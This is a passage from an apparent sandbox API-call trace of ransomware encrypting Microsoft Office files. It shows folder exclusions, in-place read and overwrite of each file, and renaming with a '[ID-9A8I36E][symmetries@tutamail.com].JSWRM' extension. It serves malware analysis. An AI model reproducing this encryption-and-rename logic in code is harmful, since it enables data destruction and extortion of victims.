lpUsedDefaultChar=0x0) returned 9 [0122.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0122.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0122.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XFUNC.VSL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0122.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XFUNC.VSL", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XFUNC.VSL", lpUsedDefaultChar=0x0) returned 9 [0122.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0122.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0122.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0122.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0122.737] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\XFUNC.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\xfunc.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.739] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=61552) returned 1 [0122.739] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf070) returned 0x24e1d8 [0122.740] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xf070, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xf070, lpOverlapped=0x0) returned 1 [0122.746] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.746] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xf070, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xf070, lpOverlapped=0x0) returned 1 [0122.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0122.747] CloseHandle (hObject=0x238) returned 1 [0122.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0122.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0122.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0122.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0122.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0122.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0122.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0122.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0122.748] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\XFUNC.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\xfunc.vsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\XFUNC.VSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\xfunc.vsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0122.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0122.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0122.749] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaf2ed8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaf2ed8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xaf2ed8f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3ba3, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="Xlate_Complete.xsn", cAlternateFileName="XLATE_~2.XSN")) returned 1 [0122.749] lstrcmpiW (lpString1="Xlate_Complete.xsn", lpString2=".") returned 1 [0122.749] lstrcmpiW (lpString1="Xlate_Complete.xsn", lpString2="..") returned 1 [0122.749] lstrcmpiW (lpString1="Xlate_Complete.xsn", lpString2="...") returned 1 [0122.749] lstrcmpiW (lpString1="Xlate_Complete.xsn", lpString2="windows") returned 1 [0122.749] lstrcmpiW (lpString1="Xlate_Complete.xsn", lpString2="recovery") returned 1 [0122.749] lstrcmpiW (lpString1="Xlate_Complete.xsn", lpString2="perflogs") returned 1 [0122.749] lstrcmpiW (lpString1="Xlate_Complete.xsn", lpString2="documents and settings") returned 1 [0122.749] lstrcmpiW (lpString1="Xlate_Complete.xsn", lpString2="$RECYCLE.BIN") returned 1 [0122.749] lstrcmpiW (lpString1="Xlate_Complete.xsn", lpString2="system volume information") returned 1 [0122.749] lstrcmpiW (lpString1="Xlate_Complete.xsn", lpString2="msocache") returned 1 [0122.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Xlate_Complete.xsn", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0122.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0122.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Xlate_Complete.xsn", cchWideChar=18, lpMultiByteStr=0x2410d8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Xlate_Complete.xsn", lpUsedDefaultChar=0x0) returned 18 [0122.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Xlate_Complete.xsn", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0122.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0122.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Xlate_Complete.xsn", cchWideChar=18, lpMultiByteStr=0x240f48, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Xlate_Complete.xsn", lpUsedDefaultChar=0x0) returned 18 [0122.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0122.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0122.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0122.753] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\Xlate_Complete.xsn" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\xlate_complete.xsn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.754] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15267) returned 1 [0122.754] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3ba0) returned 0x24e1d8 [0122.755] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x3ba0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x3ba0, lpOverlapped=0x0) returned 1 [0122.757] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.757] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x3ba0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x3ba0, lpOverlapped=0x0) returned 1 [0122.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0122.758] CloseHandle (hObject=0x238) returned 1 [0122.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0122.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0122.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0122.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0122.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0122.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0122.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.758] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\Xlate_Complete.xsn" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\xlate_complete.xsn"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\Xlate_Complete.xsn.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\xlate_complete.xsn.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0122.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0122.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0122.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0122.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0122.759] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaf2ed8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaf2ed8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xaf2ed8f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x30eb, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="Xlate_Init.xsn", cAlternateFileName="XLATE_~1.XSN")) returned 1 [0122.759] lstrcmpiW (lpString1="Xlate_Init.xsn", lpString2=".") returned 1 [0122.759] lstrcmpiW (lpString1="Xlate_Init.xsn", lpString2="..") returned 1 [0122.759] lstrcmpiW (lpString1="Xlate_Init.xsn", lpString2="...") returned 1 [0122.759] lstrcmpiW (lpString1="Xlate_Init.xsn", lpString2="windows") returned 1 [0122.759] lstrcmpiW (lpString1="Xlate_Init.xsn", lpString2="recovery") returned 1 [0122.759] lstrcmpiW (lpString1="Xlate_Init.xsn", lpString2="perflogs") returned 1 [0122.759] lstrcmpiW (lpString1="Xlate_Init.xsn", lpString2="documents and settings") returned 1 [0122.759] lstrcmpiW (lpString1="Xlate_Init.xsn", lpString2="$RECYCLE.BIN") returned 1 [0122.759] lstrcmpiW (lpString1="Xlate_Init.xsn", lpString2="system volume information") returned 1 [0122.759] lstrcmpiW (lpString1="Xlate_Init.xsn", lpString2="msocache") returned 1 [0122.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0122.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Xlate_Init.xsn", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0122.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Xlate_Init.xsn", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Xlate_Init.xsn", lpUsedDefaultChar=0x0) returned 14 [0122.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0122.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0122.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Xlate_Init.xsn", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0122.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Xlate_Init.xsn", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Xlate_Init.xsn", lpUsedDefaultChar=0x0) returned 14 [0122.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0122.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0122.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0122.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0122.760] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\Xlate_Init.xsn" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\xlate_init.xsn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.760] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12523) returned 1 [0122.760] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30e0) returned 0x24e1d8 [0122.761] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x30e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x30e0, lpOverlapped=0x0) returned 1 [0122.763] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.763] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x30e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x30e0, lpOverlapped=0x0) returned 1 [0122.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0122.763] CloseHandle (hObject=0x238) returned 1 [0122.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0122.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0122.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0122.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0122.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0122.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0122.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.764] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\Xlate_Init.xsn" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\xlate_init.xsn"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\Xlate_Init.xsn.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\xlate_init.xsn.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0122.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0122.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0122.765] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc576616a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc576616a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd958a7d7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1041ac0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="XLINTL32.DLL", cAlternateFileName="")) returned 1 [0122.765] lstrcmpiW (lpString1="XLINTL32.DLL", lpString2=".") returned 1 [0122.765] lstrcmpiW (lpString1="XLINTL32.DLL", lpString2="..") returned 1 [0122.765] lstrcmpiW (lpString1="XLINTL32.DLL", lpString2="...") returned 1 [0122.765] lstrcmpiW (lpString1="XLINTL32.DLL", lpString2="windows") returned 1 [0122.765] lstrcmpiW (lpString1="XLINTL32.DLL", lpString2="recovery") returned 1 [0122.765] lstrcmpiW (lpString1="XLINTL32.DLL", lpString2="perflogs") returned 1 [0122.765] lstrcmpiW (lpString1="XLINTL32.DLL", lpString2="documents and settings") returned 1 [0122.765] lstrcmpiW (lpString1="XLINTL32.DLL", lpString2="$RECYCLE.BIN") returned 1 [0122.765] lstrcmpiW (lpString1="XLINTL32.DLL", lpString2="system volume information") returned 1 [0122.765] lstrcmpiW (lpString1="XLINTL32.DLL", lpString2="msocache") returned 1 [0122.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0122.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLINTL32.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLINTL32.DLL", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XLINTL32.DLL", lpUsedDefaultChar=0x0) returned 12 [0122.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0122.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0122.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLINTL32.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLINTL32.DLL", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XLINTL32.DLL", lpUsedDefaultChar=0x0) returned 12 [0122.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0122.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0122.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0122.766] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xef9fabe6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xef9fabe6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefd42039, 